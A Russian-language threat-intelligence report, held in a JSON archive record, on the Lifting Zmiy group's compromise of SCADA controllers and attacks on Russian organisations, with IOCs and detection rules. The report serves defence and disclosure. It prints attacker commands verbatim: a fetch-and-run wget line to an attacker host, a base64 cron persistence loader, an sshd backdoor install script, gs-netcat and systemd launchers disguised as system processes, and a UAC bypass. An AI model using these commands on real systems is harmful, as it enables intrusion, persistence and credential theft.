{ "id": "6ea1e614-3c1e-4f2e-899e-18343d06b5b0", "created_at": "2026-04-06T00:18:07.677106Z", "updated_at": "2026-04-10T03:36:33.908736Z", "deleted_at": null, "sha1_hash": "f5d12ac3a3301f6d56baf0f3de78faebbef3ecf9", "title": "Взлом SCADA-Систем и Атаки на Российские Компании", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3056584, "plain_text": "Взлом SCADA-Систем и Атаки на Российские Компании\r\nBy Роман Бетельгейзе\r\nPublished: 2000-01-01 · Archived: 2026-04-05 12:59:49 UTC\r\nВ октябре 2023 года в наше поле зрения попала группировка, которую мы назвали Lifting Zmiy. Мы не стали\r\nобъединять ее с другими “Змиями” (например, с Shedding Zmiy), поскольку считаем, что, хотя цели (российские\r\nкомпании и госорганы) и предположительное происхождение (Восточная Европа) у них совпадают, modus operandi\r\nвсе-таки существенно различается. У Shedding Zmiy обширный часто изменяющийся арсенал из кастомных\r\nзагрузчиков и бэкдоров, наряду со свободно распространяемыми инструментами. Lifting Zmiy (по крайней мере в\r\nпроанализированных нами инцидентах) оперирует в основном open-source инструментарием и демонстрирует\r\nвысокий уровень знания Linux-систем. Кроме того, группировка использовала весьма экзотическую инфраструктуру\r\nдля серверов управления. Они взламывали ПЛК (программируемые логические контроллеры) для управления и\r\nдиспетчеризации, которые в том числе используются для управления лифтовым оборудованием и входят в состав\r\nSCADA-систем. Группировка внедряла в них код управления своим ВПО, нацеленным уже на основных жертв.\r\nИтак, в октябре мы увидели активность группировки ITW (в дикой природе), а уже в декабре 2023 года команду\r\nSolar 4RAYS привлекли к расследованию атаки на компанию, которая является подрядчиком российских госорганов.\r\nВ ходе расследования мы нашли ПО с открытым исходным кодом Reverse SSH, используемое атакующими на этапе\r\nпостэксплуатации. При анализе образца мы обнаружили сервер управления, по которому с помощью сервисов\r\nсканирования интернета удалось определить другие C2-адреса. Мы поставили все сетевые индикаторы на\r\nмониторинг и вскоре вышли на другие зараженные организации. В них после проведения исследований удалось\r\nнайти не только больше образцов ВПО, но и следы использования атакующими инфраструктуры провайдера\r\nStarlink.\r\nКраткое содержание отчета:\r\nМы обнаружили серию атак на российские госорганизации и частные компании. За ними стоит одна и та же\r\nгруппа, которую мы назвали Lifting Zmiy;\r\nЗлоумышленники взламывали ПЛК Текон-Автоматика и размещали на них управляющие серверы,\r\nиспользуемые в атаках на главные цели;\r\nСреди скомпрометированных устройств — входящие в состав SCADA-систем контроллеры, которые в том\r\nчисле управляют лифтовым оборудованием;\r\nИспользуя определенный паттерн, мы просканировали интернет и обнаружили серию взломанных\r\nконтроллеров, используемых Lifting Zmiy;\r\nСреди жертв - организации из разных отраслей, включая ИТ, телеком, госсектор. Были атакованы как Linux-,\r\nтак и Windows-системы;\r\nАтакующие в своих операциях использовали инфраструктуру провайдера Starlink компании SpaceX.\r\nВ этом отчете мы расскажем о цепочке расследованных атак, за которыми стоит Lifting Zmiy, разберем\r\nиспользуемые группой инструменты, приведем индикаторы компрометации, а также подробнее остановимся на ее\r\nинфраструктуре. А если вы увидели подозрительную активность в своей сети и считаете, что тоже стали жертвой\r\nхакерской группировки, пишите нам. Эксперты Solar 4RAYS проведут расследование, выявят проблемы и дадут\r\nнеобходимые рекомендации, чтобы защитить вашу инфраструктуру от хакеров.\r\nКейс 1. Reverse SSH и SCADA-системы\r\nВпервые с деятельностью Lifting Zmiy мы столкнулись в декабре 2023 года, когда в одном из проукраинских\r\nтелеграм-каналов была опубликована информация о взломе российской государственной организации. Эксперты\r\nSolar 4RAYS участвовали в расследовании инцидента, в результате которого, предположительно, злоумышленники\r\nукрали данные и уничтожили небольшую часть доступной им инфраструктуры, но не в самом ведомстве, а в одной\r\nиз его компаний-подрядчиков.\r\nВ рамках исследования мы установили, что первоначальный доступ к внутренней сети организации взломщики\r\nполучили в начале 2023 года путём перебора паролей FTP-сервера. Подключение осуществлялось с адреса\r\n45.78.6[.]136 (AS 25820). Это самые ранние сохранившиеся следы атаки. Позже для подключения к инфраструктуре\r\nзлоумышленники использовали другие адреса, например 45.78.7[.]88 — из пула того же провайдера IT7 Networks, а\r\nтакже ProtonVPN. Важно отметить, что с момента проникновения до начала активных действий по уничтожению\r\nинфраструктуры прошло более 11 месяцев.\r\nДля закрепления в инфраструктуре группировка использовала Reverse SSH реверс-шелл с командным сервером\r\n176.192.20[.]118:443. Это ВПО с открытым исходным кодом является визитной карточкой Lifting Zmiy. Именно\r\nблагодаря этому инструменту мы отслеживали активность злоумышленников и узнавали об их новых жертвах.\r\nПосле запуска процесса сам шелл удалялся, чтобы затруднить обнаружение. Другие интересные технические\r\nподробности вредоноса описаны в соответствующем разделе.\r\nhttps://rt-solar.ru/solar-4rays/blog/4506/\r\nPage 1 of 21\n\nКроме упомянутого реверс-шелла, злоумышленники использовали ПО SSH-IT, предназначенное для перехвата\r\nвводимых пользователем команд в рамках SSH-сессий. Для очистки журналов ОС Linux также использовался mig-logcleaner — еще один инструмент с открытым исходным кодом.\r\nМы предполагаем, что главной целью злоумышленников являются конфиденциальные данные атакованных\r\nорганизаций. После достижения цели, либо, как в данном случае, при невозможности продвинуться вглубь\r\nинфраструктуры, они приступают к деструктивным действиям: удаляют данные в доступных им системах.\r\nИнтересно, что в ходе поиска следов злоумышленника в инфраструктуре компании, на сервере Exchange мы\r\nобнаружили следы другой атаки с использованием уязвимости ProxyLogon. Исследуемый нами сервер был\r\nскомпрометирован в начале марта 2021, задолго до Lifting Zmiy. Примерно тогда же на хост было загружено и\r\nдобавлено в автозагрузку ВПО Shadowpad с командным сервером 198.58.118[.]167. Указанное ВПО часто связывают\r\nс группами Blackfly/Grayfly/Winnti (APT41) и Mustang Panda.\r\nПоворотным моментом в нашем расследовании стало изучение используемого Lifting Zmiy реверс-шелла и анализ\r\nего С2, в ходе которого было установлено, что он был развернут на программно-аппаратном комплексе\r\n«Концентратор универсальный КУН-IP8».\r\nБаннер веб-интерфейса устройства КУН-IP8 на 80 порту\r\nОборудование Текон-Автоматика\r\nКак следует из быстрого поиска по открытым источникам, производством контроллера КУН-IP8 занимается\r\nкомпания Текон-Автоматика. Из общедоступного описания следует, что она специализируется на разработке\r\nавтоматизированных систем управления и диспетчеризации, которые используются в том числе в конструкции\r\nлифтов. Поэтому внутри нашей команды группировка проходила под кодовым названием “лифтеры”.\r\nПосле обнаружения первого С2 на одном из таких ПЛК (КУН-IP8) мы занялись поиском и анализом других\r\nпублично развернутых контроллеров. В ходе такого исследования было обнаружено свыше десятка зараженных\r\nустройств (детали можно найти ниже), а также другая модель атакуемого контроллера — КИО-2M(R)S.\r\nПрошивка для этих устройств является универсальной и функционирует на базе ядра Linux, что вкупе с\r\nвозможностью написания кастомных LUA-плагинов предоставляет злоумышленнику широкие возможности для\r\nэксплуатации данного оборудования. О подобной атаке (повышения привилегий на устройстве до root) ИБ-эксперт\r\nХосе Бертин написал в своём посте еще в марте 2022 года. Вот основные выводы из его исследования:\r\nболее 100 единиц эксплуатируемого оборудования обнаруживаются простыми запросами в публичных\r\nсервисах пассивного сканирования;\r\nна момент публикации исследования, учетные данные администратора по умолчанию были размещены в\r\nтехнической документации к оборудованию на официальном сайте Текон-Автоматика;\r\nна многих устройствах учетные данные по умолчанию не менялись после первичной настройки\r\nоборудования, что предоставляет доступ с правами администратора (не root).\r\nhttps://rt-solar.ru/solar-4rays/blog/4506/\r\nPage 2 of 21\n\nУчетные данные по умолчанию в документации к оборудованию\r\nВпоследствии Текон-Автоматика отреагировала на это и удалила учетные данные из публичного доступа на\r\nофициальном сайте, но:\r\nдля оборудования существует модуль загрузки и выполнения кастомных плагинов LUA-сценариев;\r\nLUA-плагины запускаются с правами root, это дает возможность выполнять любые bash-команды с\r\nправами суперпользователя, что может являться серьезным недостатком системы безопасности\r\nпродукта.\r\nКак видно из публикации, при соблюдении администраторами устройств простых правил цифровой гигиены,\r\nнапример, смены учетных данных по умолчанию, можно как минимум усложнить злоумышленникам доступ к\r\nуязвимым функциям прошивки.\r\nМы полагаем, что в ходе атаки Lifting Zmiy воспользовались публично размещенной информацией о\r\nнесовершенствах безопасности устройств Текон-Автоматика и проэксплуатировали имеющиеся уязвимости\r\nсистемы для размещения на них С2 серверной части, используемой в дальнейших атаках на свои главные цели.\r\nКейс 2. SSHD Backdoor\r\nВ результате анализа командных серверов злоумышленников, размещенных в скомпрометированных SCADA-системах, мы выделили паттерн, при помощи которого смогли обнаружить другие предполагаемые С2-серверы:\r\n79.120.62[.]218\r\n79.111.117[.]174\r\n79.111.233[.]34\r\n176.192.57[.]122 - из найденного образца Reverse SSH\r\nБлагодаря этому открытию была установлена новая жертва злоумышленников — телеком-оператор, из сети которого\r\nнесколько серверов обращались к одному из С2.\r\nГруппировка проникла в инфраструктуру оператора также путем перебора паролей. Это произошло в сентябре 2023.\r\nУспешное подключение осуществлено с адреса 45.78.7[.]88. Продвижение по внутренней сети было легкой задачей\r\nдля атакующих, так как администраторы использовали словарные пароли небольшой длины (менее 8 символов).\r\nВ ходе расследования этого инцидента мы обнаружили новые образцы Reverse SSH, которые маскировались под\r\nлегитимные процессы devd. Образцы были размещены в стандартной директории /sbin, а после запуска удалялись:\r\nСреди прочего мы обнаружили забэкдоренный сервис sshd в виде модифицированного файла sshd и библиотеки\r\nlibprivatessh.so.5. Назначение бэкдора и детальное описание его функций можно найти ниже. Вредоносные файлы\r\nдоставлялись на систему вместе со скриптом deploy.sh. Данный сценарий замещал оригинальные легитимные\r\nфайлы на пропатченные забекдоренные аналоги:\r\n \r\nmv /usr/sbin/sshd /usr/sbin/sshd.orig\r\ncp sshd /usr/sbin/\r\nmv /usr/lib/libprivatessh.so.5 /usr/lib/libprivatessh.so.5.orig\r\ncp libprivatessh.so.5 /usr/lib/\r\ntouch -r /usr/sbin/sshd.orig /usr/sbin/sshd\r\ntouch -r /usr/lib/libprivatessh.so.5.orig /usr/lib/libprivatessh.so.5\r\nhttps://rt-solar.ru/solar-4rays/blog/4506/\r\nPage 3 of 21\n\nmkdir /var/mail/...\r\nservice sshd restart\r\n \r\nМы предполагаем, что здесь целью Lifting Zmiy в первую очередь был доступ к данным. Как и в первом кейсе, с\r\nмомента проникновения в инфраструктуру до запуска злоумышленниками различного ВПО и установки бэкдоров\r\nпрошло несколько месяцев. Это может быть связано с приобретением и аккумуляцией доступов\r\nзлоумышленниками.\r\nКейс 3. Телеком снова под ударом\r\nНам известно и о других атаках Lifting Zmiy на региональных телеком-операторов в январе-феврале 2024\r\nгода.Напрямую мы не участвовали в расследовании этих инцидентов, но провели исследование связанных с ними\r\nартефактов. Как и в первых двух описанных случаях, сервером управления являлся заражённый контроллер КУН-IP8, но с новым С2 - 79.120.38[.]38.\r\nДля получения первоначального доступа использовался перебор паролей с уже известных нам подсетей провайдера\r\nIT7 Networks, а также адреса ProtonVPN.\r\nЗакрепление на скомпрометированных хостах организовывалось путём модификации легитимных cron-задач,\r\nнапример, добавлением Base64-закодированной строки в файл /etc/cron.daily/logrotate:\r\n \r\n#!/bin/sh\r\necho d2dldCBodHRwOi8vMTA0LjI1NS42Ni4xMzkvPHJlZGFjdGVkPi5odG1sICAtTyAvdmFyL3RtcC9scjEuc2ggOyBiYXNoIC92YXIvdG1wL2xyMS5zaCA7I\r\n/usr/sbin/logrotate /etc/logrotate.conf \u003e/dev/null 2\u003e\u00261\r\nEXITVALUE=$?\r\nif [ $EXITVALUE != 0 ]; then\r\n /usr/bin/logger -t logrotate \"ALERT exited abnormally with [$EXITVALUE]\"\r\nfi\r\nexit 0\r\n \r\nЗакодированная строка выполняет загрузку и последующий запуск bash-сценария:\r\nwget http://104.255.66[.]139/\u003credacted\u003e.html -O /var/tmp/lr1.sh ; bash /var/tmp/lr1.sh ; rm -f\r\n/var/tmp/lr1.sh\r\nВ рамках исследования открытых директорий на сервере злоумышленников 104.255.66[.]139 по пути “/i/block.txt”\r\nбыла обнаружена другая полезная нагрузка:\r\n/usr/bin/pkill -0 -U0 defunct 2\u003e/dev/null || SHELL=/bin/bash TERM=xterm-256color GS_ARGS=\"-k\r\n/usr/bin/defunct.dat -liqD\" /bin/bash -c \"exec -a '[mm_percpu_wq]' '/usr/bin/defunct'\" 2\u003e/dev/null\r\nВ скрипте /usr/bin/defunct — это утилита gs-netcat из репозитория gsocket, она используется для создания туннелей и\r\nобхода ограничений фаервола. Также примечателен способ маскирования имени процесса при помощи команды\r\n“exec -a”, выполняющей замену нулевого аргумента при запуске процесса — таким образом, в списке процессов\r\nбудет отображаться [mm_percpu_wg].\r\nКейс 4. Starlink\r\nВ феврале 2024 года к нам обратилась ИТ-компания после того, как на компьютере системного администратора\r\nпоявилось диалоговое окно с входящей RDP-сессией. Так как источником подключения выступал Linux-сервер,\r\nадминистратор сразу забил тревогу, и мы взялись за расследование.\r\nИ хотя в рамках данного кейса не было обнаружено следов использования Reverse SSH, мы нашли небольшую, но\r\nинтересную зацепку. Злоумышленники в один день подключались к инфраструктуре из кейса №2 и №4 с одного и\r\nтого же IP-адреса 45.78.7[.]88. Есть небольшая вероятность, что в момент подключения адрес мог использоваться,\r\nкак публичный прокси-сервис или VPN, и соединения с него в инфраструктуры обеих жертв — действия разных\r\nатакующих. Однако, согласно публичной информации из AbuseIPDB, IP-адрес и ранее был замечен в\r\nнемногочисленных атаках типа SSH brute force против систем преимущественно из России. Суммируя\r\nвышесказанное, мы связываем эту атаку с группой Lifting Zmiy cо средней уверенностью.\r\nПервоначальный доступ к инфраструктуре жертвы был получен путем успешного перебора паролей к FTP-сервису в\r\nфеврале 2023 года, к активным действиям злоумышленники перешли в конце лета 2023. Они загрузили SSH-ключ в\r\nдоступную на запись домашнюю директорию пользователя с последующим подключением под этим пользователем\r\nпо SSH. Для продвижения по инфраструктуре злоумышленники использовали различные публично доступные\r\nинструменты:\r\nhttps://rt-solar.ru/solar-4rays/blog/4506/\r\nPage 4 of 21\n\nssh-snake - червь, использующий SSH-ключи с зараженных машин для дальнейшего продвижения.\r\nИнструмент был опубликован на GitHub в начале 2024 года и активно используется различными\r\nзлоумышленниками;\r\nkerbrute - утилита для перебора учётных записей в Active Directory, использующих для аутентификации\r\nпротокол Kerberos.\r\nResponder - утилита для проведения атак типа MiTM с поддержкой различных методов аутентификации в\r\nWindows;\r\nproxychains3 - ПО для проксирования трафика;\r\ncrackmapexec - обширный набор инструментов для проведения целого ряда атак на Windows/AD-инфраструктуру;\r\nEmpire-агент - агент фреймворка Empire, предоставляющий обширный набор инструментов для\r\nпостэксплуатации.\r\nС целью перехвата паролей пользователей злоумышленники добавляли в конфигурационные файлы оболочки Bash\r\nфункцию sudo следующего вида:\r\nТаким образом, при вызове команды “sudo” введенный пользователем пароль записывается в файл /tmp/.font-unix/.font-data и отправляется в закодированной base64-строке на сервер, указанный в параметрах утилиты curl. Для\r\nполучения паролей на сервере из параметра curl злоумышленник запускал веб-сервер “http.server” из стандартного\r\nнабора библиотек Python.\r\nСогласно собранной нами информации о списке IP-адресов, с которых Lifting Zmiy подключались к инфраструктуре\r\nжертв, изначально использовались различные VPN- и VPS-ресурсы (ProtonVPN, ruvps.net, weasel.cloud). Но в конце\r\nдекабря 2023 в списке адресов начал фигурировать провайдер Starlink:\r\n145.224.121[.]64        AS 14593 (SPACEX-STARLINK) UA\r\n145.224.123[.]25        AS 14593 (SPACEX-STARLINK) UA\r\n145.224.123[.]55        AS 14593 (SPACEX-STARLINK) UA\r\n209.198.130[.]120      AS 14593 (SPACEX-STARLINK) UA\r\nЭти IP-адреса, согласно информации из Whois, принадлежат компании SpaceX и используются для предоставления\r\nспутникового интернета через терминалы Starlink.\r\nТехническое описание ВПО\r\nReverse SSH\r\nMD5 e68a4c4969eb6a3bd14d68a2095ea212\r\nSHA1 e2ea2a3c5e2538cdd6ea97452d9ea291afb1eff1\r\nSHA256 2555ca7597171a0fc8ff75015e7e1d03c7ca5a632907640de65c6084d635b3a9\r\nFile name 176.192.20.118\r\nhttps://rt-solar.ru/solar-4rays/blog/4506/\r\nPage 5 of 21\n\nFile type ELF 64-bit LSB executable\r\nFile size 7.89 MB\r\nSource code https://github.com/NHAS/reverse_ssh\r\nОпустим детальное описание функционала Reverse SSH, так как это ПО с открытым исходным кодом, но\r\nостановимся на его основных функциях и особенностях, которые мы отметили при изучении обнаруженных в дикой\r\nприроде (ITW-образцов):\r\nреализация reverse shell по протоколу SSH;\r\nкроссплатформенность;\r\nвстроенный функционал доставки файлов на хост-клиент посредством SCP и SFTP;\r\nвозможность встраивания адреса сервера управления и кастомного fingerprint в исполняемый файл клиента\r\nпри самостоятельной сборке и компиляции исходного кода;\r\nвозможность загружать и запускать исполняемые файлы бесфайловым методом (вызов memfd) как с сервера\r\nуправления RSSH, так и с любого веб-ресурса.\r\nНа момент нашего исследования ITW были обнаружены образцы двух версий: v2.1.5 (от 04.08.2023) и v2.4.1 (от\r\n30.11.2023). Из интересных отличий — коммит “Make webserver look like nginx” (от 13.09.2023):\r\nДобавленный функционал позволяет маскировать активный сервер управления Reverse SSH от различных сервисов\r\nпассивного сканирования и исследователей, выдавая при обычном GET-запросе баннер легитимного веб-сервера\r\nNginx с кодом ошибки 404.\r\nC2 сервер Reverse SSH, замаскированный под Nginx\r\nОтдельно стоит отметить, что для инициализации сетевого соединения С2 отправляет клиенту Public Key, который\r\nможно увидеть в сетевом трафике.\r\nhttps://rt-solar.ru/solar-4rays/blog/4506/\r\nPage 6 of 21\n\nPublic Key сервера при инициализации соединения с клиентом Reverse SSH\r\nДля проверки публичного ключа С2-сервера в каждый образец жестко закодирован fingerprint, который является\r\nSHA256-значением соответствующего ключа.\r\nЗахардкоженный в образец Fingerprint публичного ключа\r\nКроме версий Reverse SSH под Linux, мы также обнаружили следы атаки на Windows-системы. По-видимому, она\r\nпроизошла не ранее октября 2023 года (регистрация вредоносного домена), но не позднее февраля 2024 года\r\n(подтвержденный факт доступности).\r\nАтака начиналась с HTA-файла “document.docx.exe” ( MD5: 86f49b35cab2b9ccf7fa306a3067dbde ), который загружался\r\nна хост жертвы с адреса: http[://]91.92.248[.]36/Downloads/document.docx.exe\r\nОсновное содержимое файла – это мусорные данные для затруднения анализа, среди которых находился\r\nобфусцированный js-скрипт для перехода к следующему этапу загрузчика:\r\nПервый этап загрузчика\r\nПервый этап загрузчика раскодирует встроенный PS-сценарий, который, в свою очередь, дешифрует base64 строку,\r\nзашифрованную алгоритмом AES, где в качестве ключа и IV берутся следующие значения:\r\nKEY = base64(“Y0xDa3dTclhNQk9jWU9SQllhU2NFcmltZ1pWVUJUbFc”)\r\nIV = base64(“AAAAAAAAAAAAAAAAAAAAA”)\r\nВторой этап загрузчика\r\nПосле расшифровки содержимого строки извлекается алгоритмом gzip и запускается следующий встроенный PS-сценарий. Данный этап загрузчика включает в себя несколько модулей для обхода защитных средств ОС Windows,\r\nтаких как UAC и Windows Defender. В первую очередь, в директорию \"%TMP%\\r.bat\" записывается batch-сценарий,\r\nдобавляющий в исключения Windows Defender директорию “%AppData%” :\r\nhttps://rt-solar.ru/solar-4rays/blog/4506/\r\nPage 7 of 21\n\nЗапись r.bat в директорию %TMP%\r\nДалее, используя раздел реестра CurVer , вредонос ссылается на создаваемый программный идентификатор\r\n(ProgID) с именем “ ServiceHostXGRT ” и значением “ FoDHelper.exe ”. Данная техника позволяет процессу\r\nFoDHelper.exe (LoLBin) выполнить batch-сценарий, прописанный в ветке реестра\r\nHKEY_CURRENT_USER\\Software\\Classes\\ServiceHostXGRT\\Shell\\Open\\Command , с повышенными привилегиями в обход\r\nUAC.\r\nПосле запуска FoDHelper.exe созданные ключи реестра удаляются, чтобы избежать обнаружения.\r\nКоманды для запуска FoDHelper.exe c последующим удалением следов\r\nДалее с адреса hxxp[://]sensor[.]fun/tiago.exe на хост жертвы загружается полезная нагрузка Reverse SSH и\r\nсохраняется в %AppData%\\tiago.exe :\r\nMD5 41b99b0770f01afbd80481fb6f811bcc\r\nSHA1 58ee2fb1672b3af2db7997bb91cf3ab138d801e1\r\nSHA256 d457b15dfcdd6669d60af6d96f56757674b6f0fbba11999f76f47e03bd635d09\r\nFile name tiago.exe\r\nFile type PE32+ executable (console) x86-64\r\nFile size 10.9 MB\r\nSource code https://github.com/NHAS/reverse_ssh\r\nВ эту же директорию с адреса hxxp[://]urler[.]site/Scan_Zakaz_1416-02-24_13-02-2024.jpg загружается decoy-изображение.\r\nhttps://rt-solar.ru/solar-4rays/blog/4506/\r\nPage 8 of 21\n\nИзображение-приманка\r\nПосле чего, перезаписывая \" %TMP%\\r.bat \" и используя упомянутую ранее технику обхода UAC, запускается\r\nполезная нагрузка tiago.exe Reverse SSH и открывается decoy-изображение:\r\nЗапуск полезной нагрузки\r\nЗа время проведения расследований нам встречались образцы со следующими фингерпринтами:\r\n9f56fc5b5f60be1030e20bbf2c03ad147e645dc6181d9707dc4b0aa6345a5ac3\r\n6a887ea19b8c6d01d2f2a746317e7f9ee76cd840f00d19b37f28e5082ca4e4ba\r\n8f55c349bc7b34c2ea0ad283836a58c3206416adcdb8cb92e0921198725d05d4\r\n4552d556f3fd4684d8f0da01d3da4505bdceed99b940aacde305c3d4eee66803\r\nТаким образом, сэмплы, содержащие в себе такие fingerprint-ы, можно с уверенностью относить к Lifting Zmiy.\r\nSSH-бэкдор\r\nНа системах жертвы мы обнаружили два образца пробэкдоренных легитимных бинарных файлов SSH — sshd и\r\nlibprivatessh.so.5 . Атакующие заменяли ими соответствующие легитимные версии, чтобы обеспечить через них\r\nудаленное SSH-подключение к целевой машине.\r\nMD5 1c2c53c430f54f59045c63c02fe774fd\r\nSHA1 13199beae514d13cf50365678a2a015166912725\r\nhttps://rt-solar.ru/solar-4rays/blog/4506/\r\nPage 9 of 21\n\nSHA256 cab22ba432a65c7db751e22a42f8a2079d3810312b24ecacccfd371bf514fe2d\r\nFile name sshd\r\nFile type ELF 64-bit LSB executable\r\nFile size 271.93 kB\r\nОсновной функционал внедренной самописной бэкдор-части кода состоит в следующем:\r\nуспешно авторизовать подключение, если MD5-хэш пароля, введенного пользователем, совпадает с жестко\r\nзахардкоженным в бэкдор значением;\r\nесли же значения MD5 не совпадают, бэкдор запишет введенные имя пользователя и пароль в локальный\r\nфайл.\r\nСлева – бэкдорный вариант, справа – оригинальная реализация функции auth_password из sshd\r\nФункционал реализован за счет вредоносных функций, дописанных в бэкдорные варианты sshd и libprivatessh.so. В\r\nфункции mw_backdoored_check_pass_md5_and_set_unicorn вычисляется MD5 пароля, введенного при\r\nаутентификации, и сравнивается с жестко закодированным значением d848c0fb4a838e85130db48661b742f1:\r\nЕсли значения совпадают, то:\r\nустанавливается значение переменной g_options_permit_root_login = PERMIT_YES, позволяя таким образом\r\nаутентифицироваться из-под учетной записи root;\r\nвызывается функция sshlog_su (такой функции нет в оригинальной библиотеке) из libprivatessh.so, где\r\nустанавливается переменная unicorn = 1 (флаг успешной авторизации).\r\nMD5 723dfe3dc3e74d16809700b5ece2b28a\r\nhttps://rt-solar.ru/solar-4rays/blog/4506/\r\nPage 10 of 21\n\nSHA1 5419d3907fbe5e08c8e92bfb9e7d13598624c37e\r\nSHA256 170e5dfe925e4065189a3708f3e565627b4def57bca550ad9c2a30f8c5a4c7f6\r\nFile name libprivatessh.so.5\r\nFile type ELF 64-bit LSB executable\r\nFile size 679.05 kB\r\nЕсли же значения не совпадают, то введенный пароль копируется в выделенный буфер. Далее вызывается функция\r\nmw_backdoored_save_ssh_creds_for_non_owner_users . Ее назначение — запись имен и паролей пользователей,\r\nкоторые не являются owner (то есть unicorn != 1), в файл \"/var/mail/.../..\". При этом могут быть записаны невалидные\r\nдля аутентификации пароли, так как проверка пароля происходит после записи учетных данных в файл.\r\nПеред записью в файл данные шифруются с помощью xor на ключе d848c0fb4a838e85130db48661b742f1 в\r\nследующем формате:\r\n\u003cdword_pair_length\u003e\\\u003cusername\u003e:\\\u003cpassword\u003e\\n\r\nГде шифруются только значения \\\u003cusername\u003e:\\\u003cpassword\u003e\\n\r\nGlobal Socket\r\nЭто еще одно ПО с открытым исходным кодом, основная задача которого — построение TCP-соединений,\r\nобходящих NAT\\Firewall через облачный сервис Global Socket Relay Network (GSRN – 135.125.107[.]221)\r\nпосредством предоставления источнику и жертве одной и той же строки-секрета. Таким образом, кроме обхода\r\nразличных средств сетевой безопасности, использование данного ПО позволяет скрыть реальный сервер управления\r\nзлоумышленников.\r\nMD5 bf0aa35ce8ce1ef1155607e57e0227c3\r\nSHA1 223d99f7f0c90d8b4eeace2ac59a71b8a1f410a6\r\nSHA256 cb5f62bf7b591e69bd38e6bf8e40e8d307d154b2935703422d44f02e403d2e78\r\nFile name gs-dbus\r\nFile type ELF 64-bit LSB executable\r\nhttps://rt-solar.ru/solar-4rays/blog/4506/\r\nPage 11 of 21\n\nFile size 1.07 MB\r\nSource code https://github.com/hackerschoice/gsocket\r\nПО имеет модульную архитектуру. Приведем краткое описание основных возможностей:\r\nМодуль gs-sftp – встроенный функционал доставки файлов на хост-клиент посредством SFTP.\r\nМодуль gsocket:\r\nпостроение SSH-соединений сервер-клиент;\r\nвозможность создавать OpenVPN-сессии между двумя хостами за NAT\\Firewall.\r\nМодуль gs-mount предоставляет доступ к удаленной файловой системе клиента.\r\nМодуль gs-netcat обладает внушительным перечнем возможностей и функций, основные из них:\r\nшифрование трафика AES-256;\r\nсоздание Socks4/4a/5 прокси-сервера;\r\nинтерактивный шелл.\r\nВ ходе нашего расследования мы обнаружили это ПО, развернутое на системах жертвы в виде сервисов:\r\n \r\n[Unit]\r\nDescription=D-Bus System Connection Bus\r\nAfter=network.target\r\n[Service]\r\nType=simple\r\nRestart=always\r\nRestartSec=10\r\nWorkingDirectory=/root\r\nExecStart=/bin/bash -c \"GS_ARGS='-k /lib/systemd/system/gs-dbus.dat -ilq' exec -a '[kcached]' '/usr/bin/gs-dbus'\"\r\n[Install]\r\nWantedBy=multi-user.target\r\n \r\nУказанный .dat-файл содержит secret-строчку для взаимодействия с сервером управления:\r\nDezUhLM7JJ2oA9GWptSBsw\r\nИнфраструктура\r\nПроанализировав найденные сэмплы Reverse SSH, мы извлекли соответствующие адреса С2, которые указывали на\r\nзараженные ПЛК Текон-Автоматика. Используя обнаруженный паттерн, мы нашли больше управляющих серверов\r\nна скомпрометированном оборудовании:\r\nC2 ASN Начало активности\r\n79.120.62[.]218 AS12714 декабрь 2023\r\n79.111.117[.]174 AS12714 декабрь 2023\r\n79.111.233[.]34 AS12714 декабрь 2023\r\nhttps://rt-solar.ru/solar-4rays/blog/4506/\r\nPage 12 of 21\n\n79.120.38[.]38 AS12714 январь 2024\r\n176.192.20[.]118 AS12714 декабрь 2023\r\n176.192.57[.]122 AS12714 март 2024\r\n176.192.49[.]226 AS12714 март 2024\r\n176.192.114[.]82 AS12714 январь 2024\r\n188.35.20[.]137 AS42148 апрель 2024\r\n178.213.207[.]91 AS42498 апрель 2024\r\n178.173.26[.]69 AS47759 декабрь 2023\r\n46.160.189[.]123 AS41560 апрель 2024\r\n46.160.189[.]124 AS41560 апрель 2024\r\n89.22.156[.]31 AS49893 апрель 2024\r\n178.22.51[.]74 AS44943 июнь 2024\r\n176.107.13[.]143 AS42998 декабрь 2023\r\nТакже в результате пассивного сканирования мы обнаружили инфраструктуру, похожую по конфигурации на\r\nсерверы управления Reverse SSH. Правда, они были размещены уже не на оборудовании Текон-Автоматики:\r\nhttps://rt-solar.ru/solar-4rays/blog/4506/\r\nPage 13 of 21\n\nC2 ASN Начало активности\r\n158.160.5[.]218 AS200350 май 2024\r\n206.119.171[.]140 AS133199 май 2024\r\n108.181.165[.]94 AS40676 май 2024\r\n179.60.149[.]42 AS395839 апрель 2024\r\n179.60.149[.]78 AS395839 апрель 2024\r\n194.190.152[.]129 AS41745 февраль 2024\r\n176.120.67[.]40 AS44477 апрель 2024\r\nВсего мы обнаружили 23 C2-сервера. На конец июня 2024 года 14 из них были активны. Из этих 14 серверов восемь\r\nбыли развернуты на взломанных ПЛК.\r\nАнализируя pDNS-данные С2-серверов, мы обнаружили домен sensor[.]fun , который резолвится в IP-адреса\r\nнайденной инфраструктуры Lifting Zmiy. Домен зарегистрирован 2023-09-29 и по крайней мере 2024-02-28 с него\r\nраздавался образец Reverse SSH ( hxxp://sensor[.]fun/tiago[.]exe - MD5: 41b99b0770f01afbd80481fb6f811bcc ).\r\nIP Первый резолв\r\n176.192.49[.]226 2024-06-14\r\n195.158.232[.]2 2024-06-14\r\n89.22.156[.]31 2024-04-10\r\n178.22.51[.]74 2024-06-14\r\nhttps://rt-solar.ru/solar-4rays/blog/4506/\r\nPage 14 of 21\n\n46.160.189[.]123 2024-06-14\r\n178.213.207[.]91 2024-06-14\r\n46.160.189[.]124 2024-06-14\r\nДля поиска С2-серверов Reverse SSH мы использовали специальные правила сканирования в нашем внутреннем\r\nхантинг-сервисе. Логика этих правил сводится к выполнению определенной комбинации следующих условий:\r\nTLS-сертификат, содержащий в CN-значение *ip*:443 (*.*.*.*:443);\r\nНаличие на 443 порту баннера веб-сервера Nginx, возвращающего ошибку 404. Это обусловлено\r\nфункционалом Reverse SSH: “Make webserver look like nginx”;\r\nДля серверов, расположенных на ПЛК Текон-Автоматика, HTML Title должен содержать соответствующие\r\nподстроки, например, “Контроллер инженерного оборудования *” или “Концентратор универсальный*”.\r\nДалее необходимо провалидировать результаты сканирования путем SSH-коннекта. Искомый С2-сервер при\r\nпопытке соединения на 443 порт, будет предлагать принять его публичный ключ, механизм которого описан выше:\r\nТаким образом, если сервер отдает фингерпринт публичного ключа при обращении на 443 порт, с высокой долей\r\nвероятности он является очередным С2-сервером Reverse SSH.\r\nАтрибуция\r\nС самого начала исследования у нас практически не было сомнения в том, что группа происходит из Восточной\r\nЕвропы, так как атакующие 